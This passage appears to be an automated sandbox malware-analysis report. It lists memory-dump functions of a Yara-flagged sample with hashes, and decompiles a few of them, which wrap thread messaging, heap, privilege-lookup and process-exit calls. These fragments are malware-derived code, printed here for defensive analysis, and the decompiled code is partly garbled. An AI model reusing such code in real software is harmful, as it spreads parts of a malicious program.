                                            Function 00A298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 06deb6f5c14df4f62de4b8f8e0c34ba5e23444f6ce369302ec7c809ef988e396
                                            • Instruction ID: 17adb3a3ecd364c71b2e277dd3572c09af7dbf22e6d9df9bad95334f38644b2d
                                            • Opcode Fuzzy Hash: 06deb6f5c14df4f62de4b8f8e0c34ba5e23444f6ce369302ec7c809ef988e396
                                            • Instruction Fuzzy Hash: 5E90026161100542D20171695404616000A97D0382F91D032B1014555ECA6589A2F171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
                                            • Instruction ID: 28958e3a7345ae037eb1f22ac6946906b7cc3b05f9de5d2c3d2373b56091ebe1
                                            • Opcode Fuzzy Hash: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
                                            • Instruction Fuzzy Hash: 1A90027121100453D21161695504707000997D0382F91D422B0414558DD6968962F161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 129948ba27a5daad941a1e69d1007ae0c8f929981630e4800dff0bfa76a6adca
                                            • Instruction ID: 5b0e79e397798ce0a5558aef6f541b9726d07febc4ac6e89d3e835623ade9a29
                                            • Opcode Fuzzy Hash: 129948ba27a5daad941a1e69d1007ae0c8f929981630e4800dff0bfa76a6adca
                                            • Instruction Fuzzy Hash: D2900261252041925645B16954045074006A7E0382B91D022B1404950CC5669866E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 572c448c98a273c8b2069a40d9132174258c54371a16429ed22d9e9cecb2da62
                                            • Instruction ID: 04430e91dc2d1331fcd62be2e282a526a6e9c9f4b79d9e5832856d84c7b6c94f
                                            • Opcode Fuzzy Hash: 572c448c98a273c8b2069a40d9132174258c54371a16429ed22d9e9cecb2da62
                                            • Instruction Fuzzy Hash: D79002A135100482D20061695414B060005D7E1342F51D025F1054554DC659CC62B166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cd510374d6375ecbf96ae5fb3b08711c25134354f319f0c08cc4b6420c468561
                                            • Instruction ID: c1f64eeb769bb5f89a1c796483e52e2fad2b795360b9b9c4a95ad70acb1fa467
                                            • Opcode Fuzzy Hash: cd510374d6375ecbf96ae5fb3b08711c25134354f319f0c08cc4b6420c468561
                                            • Instruction Fuzzy Hash: B89002A121200043420571695414616400A97E0342F51D031F1004590DC56588A1B165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6c2869441fbe63aff897381dd182d294a13da8c1d43b12b59543032825fb03ff
                                            • Instruction ID: 5eec4ef28b877f572f8220654545f629d871ac2782f42b3eb80d7f61d9b05f29
                                            • Opcode Fuzzy Hash: 6c2869441fbe63aff897381dd182d294a13da8c1d43b12b59543032825fb03ff
                                            • Instruction Fuzzy Hash: 0F9002B121100442D24071695404746000597D0342F51D021B5054554EC6998DE5B6A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4688c8091f764dfecdb99d4e5bf85dae24bba103e3c1d566dc7f2fdddfa66ab2
                                            • Instruction ID: bfbd9d35b58bb8fb94f9e7788d374255e2aa75cc844bb95f49eca846b6633530
                                            • Opcode Fuzzy Hash: 4688c8091f764dfecdb99d4e5bf85dae24bba103e3c1d566dc7f2fdddfa66ab2
                                            • Instruction Fuzzy Hash: 4D900265221000430205A5691704507004697D5392751D031F1005550CD6618871A161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
                                            • Instruction ID: 08e4cd19546d3bd447dd4526378442c1ff09dcb030cbca0bc961e9afb5ebac13
                                            • Opcode Fuzzy Hash: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
                                            • Instruction Fuzzy Hash: D190027121108842D2106169940474A000597D0342F55D421B4414658DC6D588A1B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d8b55692db6d71a6f2276583fbc4953a5133472000b6b46352cdd11386a6ddd8
                                            • Instruction ID: b72da16297ca79d31398e5f700cf72b3d539bdeb780ff61ea39e9fab882bf61d
                                            • Opcode Fuzzy Hash: d8b55692db6d71a6f2276583fbc4953a5133472000b6b46352cdd11386a6ddd8
                                            • Instruction Fuzzy Hash: 27900261611000824240717998449064005BBE1352B51D131B0988550DC5998875A6A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2427cea116cf97ab25964171a80dfae812fa9137a691291182c88622be40c982
                                            • Instruction ID: 6701683ed14710fa320259735127c32efe139d5afcfd52a3b7ec47f02e60d19c
                                            • Opcode Fuzzy Hash: 2427cea116cf97ab25964171a80dfae812fa9137a691291182c88622be40c982
                                            • Instruction Fuzzy Hash: A190027121140442D2006169581470B000597D0343F51D021B1154555DC6658861B5B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
                                            • Instruction ID: d35f09fd723b5e0fc727402335f86f0ccb027a0828c8e239d579429ca5bb85cb
                                            • Opcode Fuzzy Hash: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
                                            • Instruction Fuzzy Hash: AF90027121100842D2807169540464A000597D1342F91D025B0015654DCA558A69B7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 27fe05028c4ca36f86e524aac8d021d84bcd97eb402f5f6ec26d3bc3a5ca2b22
                                            • Instruction ID: 8cd0c1340ef06e58be87b68b7ca70733bdaea9fe279cce7e6aab9b8b6689aedd
                                            • Opcode Fuzzy Hash: 27fe05028c4ca36f86e524aac8d021d84bcd97eb402f5f6ec26d3bc3a5ca2b22
                                            • Instruction Fuzzy Hash: 1B90026122180082D30065795C14B07000597D0343F51D125B0144554CC9558871A561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3c54286343b6ed4c7ae099012c55aad2de5dca3deabf300569b63c4933a98af3
                                            • Instruction ID: dea76e4413910ae6a6a88a39a6de04067b22dcc804daa29ac78505f840d16c56
                                            • Opcode Fuzzy Hash: 3c54286343b6ed4c7ae099012c55aad2de5dca3deabf300569b63c4933a98af3
                                            • Instruction Fuzzy Hash: 6A90026131100043D240716964186064005E7E1342F51E021F0404554CD9558866A262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 16eb918c4f61beebe3d93807a58484dc49fbdb83d3502b05d7ecedc742640876
                                            • Instruction ID: 99d4593e81239358acfea8e4664647f5983c00d91cb8b863d5a3df54ac53e714
                                            • Opcode Fuzzy Hash: 16eb918c4f61beebe3d93807a58484dc49fbdb83d3502b05d7ecedc742640876
                                            • Instruction Fuzzy Hash: F590026922300042D2807169640860A000597D1343F91E425B0005558CC9558879A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8fbca4cecff82d7a06d085ff61accf2488f005a9de47ca8580fcf0cedf45f830
                                            • Instruction ID: 8655fafa0e76b3e75747a8d9232a2d1bd598157e15b30bee04855c4ca57cc492
                                            • Opcode Fuzzy Hash: 8fbca4cecff82d7a06d085ff61accf2488f005a9de47ca8580fcf0cedf45f830
                                            • Instruction Fuzzy Hash: 7990027121100442D20065A96408646000597E0342F51E021B5014555EC6A588A1B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                            • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                            • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                            • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 23%
                                            			E004082E8(void* __eax, void* __ecx, long _a8) {
				intOrPtr _v0;
				char _v71;
				char _v72;
				intOrPtr* _t15;
				int _t16;
				char* _t20;
				long _t25;
				void* _t29;
				int _t30;
				void* _t33;
				void* _t35;

				asm("fsubr qword [0xc992cc11]");
				_t33 = _t35;
				_v72 = 0;
				E0041B860( &_v71, 0, 0x3f);
				_t20 =  &_v72;
				L0041C400(_t20, 3);
				_t29 = _v0 + 0x1c;
				_t15 = E0040ACD0(_t29, _t29,  &_v72);
				 *_t15 =  *_t15 - _t15;
				 *((intOrPtr*)(_t15 - 0x2a)) =  *((intOrPtr*)(_t15 - 0x2a)) + _t20;
				asm("les ebp, [edx]");
				_push(0);
				_push(_t15);
				_push(_t29);
				_t16 = L00414E20();
				_t30 = _t16;
				if(_t30 != 0) {
					_t25 = _a8;
					_t16 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t43 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t30(_t25, 0x8003, _t33 + (L0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}














                                            0x004082e9
                                            0x004082f1
                                            0x004082ff
                                            0x00408303
                                            0x00408308
                                            0x0040830e
                                            0x0040831a
                                            0x0040831e
                                            0x00408320
                                            0x00408322
                                            0x00408327
                                            0x0040832a
                                            0x0040832c
                                            0x0040832d
                                            0x0040832e
                                            0x00408333
                                            0x0040833a
                                            0x0040833d
                                            0x0040834a
                                            0x0040834c
                                            0x0040834e
                                            0x0040836b
                                            0x0040836b
                                            0x0040836d
                                            0x00408372

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: dc7c9b8ff7cf7bfd8f45c3dc27a9f24693a66079d45a4f27965ec2911998c338
                                            • Instruction ID: e8f78f9b746fdc70bbafdd547a47b53fe41318028a736c67dd0bb144aa5980b3
                                            • Opcode Fuzzy Hash: dc7c9b8ff7cf7bfd8f45c3dc27a9f24693a66079d45a4f27965ec2911998c338
                                            • Instruction Fuzzy Hash: 6D012431A802287AE720A6A59D43FFE372CAB40F15F04411EFF04FA1C1DBA9290646E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 28%
                                            			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t14;
				intOrPtr* _t15;
				int _t16;
				char* _t19;
				long _t24;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				_t19 =  &_v68;
				L0041C400(_t19, 3);
				_t27 = _a4 + 0x1c;
				_t14 = E0040ACD0(_t27, _t27,  &_v68);
				 *_t14 =  *_t14 - _t14;
				 *((intOrPtr*)(_t14 - 0x2a)) =  *((intOrPtr*)(_t14 - 0x2a)) + _t19;
				asm("les ebp, [edx]");
				_push(0);
				_push(_t14);
				_push(_t27);
				_t15 = L00414E20();
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t36 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t28(_t24, 0x8003, _t29 + (L0040A460(_t36, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}













                                            0x004082ff
                                            0x00408303
                                            0x00408308
                                            0x0040830e
                                            0x0040831a
                                            0x0040831e
                                            0x00408320
                                            0x00408322
                                            0x00408327
                                            0x0040832a
                                            0x0040832c
                                            0x0040832d
                                            0x0040832e
                                            0x00408333
                                            0x0040833a
                                            0x0040833d
                                            0x0040834a
                                            0x0040834c
                                            0x0040834e
                                            0x0040836b
                                            0x0040836b
                                            0x00000000
                                            0x0040836d
                                            0x00408372

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                            • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                            • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                            • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082B6, Relevance: 1.5, APIs: 1, Instructions: 49threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 8a1f0553f9aa59e503983324a55770187fdeb2aa4661b62cea9826e01f2a634e
                                            • Instruction ID: cf962fe462439d7b7fcbd575088aa3c3da4f462320113a969414827e79c109ef
                                            • Opcode Fuzzy Hash: 8a1f0553f9aa59e503983324a55770187fdeb2aa4661b62cea9826e01f2a634e
                                            • Instruction Fuzzy Hash: 6C01DB326402147AD7109AB5AC42FEA7358EB45B11F09416EFE04AB2C1E6B9984987E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x0041a07f
                                            0x0041a087
                                            0x0041a09d
                                            0x0041a0a1

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x0041a047
                                            0x0041a05d
                                            0x0041a061

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x0041a1ea
                                            0x0041a200
                                            0x0041a204

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                            0x0041a0b3
                                            0x0041a0ca
                                            0x0041a0d8

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
                                            • Instruction ID: 57eb72967a0576cc9f8e682aceb4822b20c24c5719fec0db515476544a9f3dfa
                                            • Opcode Fuzzy Hash: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
                                            • Instruction Fuzzy Hash: A0B09B719014D5C9D711D7745608717794077D0741F16C071E1020641A4778C495F5B6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 004172F0, Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b2c359d43c41f8124d3e3d0b8af42d6c08adbe7f1f3f6c642d998c40f5ee991
                                            • Instruction ID: 740181601489bf939361c221166955c064686c9a939c061dbf57760c78d350e6
                                            • Opcode Fuzzy Hash: 5b2c359d43c41f8124d3e3d0b8af42d6c08adbe7f1f3f6c642d998c40f5ee991
                                            • Instruction Fuzzy Hash: 50A00117F450184554255C8A7C421B8F3A4D587076D5433A7DE0CB35011402C429059D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A298A0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f30b2e47baa18727bb04a0baa26f7ddcbd4f2a9908845587a80a06bcf9c8a626
                                            • Instruction ID: 78efa16da1abecb392e832394c797e00fcb16e31dc0a5ace07b4901a40fafbcd
                                            • Opcode Fuzzy Hash: f30b2e47baa18727bb04a0baa26f7ddcbd4f2a9908845587a80a06bcf9c8a626
                                            • Instruction Fuzzy Hash: D090026131100442D202616954146060009D7D1386F91D022F1414555DC6658963F172
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29820, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0cb2d8a5dd7d671046ebfc7af4efa9abfd3b0c5638058bac5fffb8529e880e7
                                            • Instruction ID: 820b6426713029a2b416e24929c2ea565243846d4a42fee74c446070dfdc2fba
                                            • Opcode Fuzzy Hash: e0cb2d8a5dd7d671046ebfc7af4efa9abfd3b0c5638058bac5fffb8529e880e7
                                            • Instruction Fuzzy Hash: DC90027125100442D241716954046060009A7D0382F91D022B0414554EC6958A66FAA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A2B040, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d79f07b20fbdadac218b03f8d7f738a2918242c7d2ec1bbcbdbbeef97b049add
                                            • Instruction ID: bdb2c4ea4183ffe7c967ac32857e3212d55d9820d598d93e3c40163e0b7c8628
                                            • Opcode Fuzzy Hash: d79f07b20fbdadac218b03f8d7f738a2918242c7d2ec1bbcbdbbeef97b049add
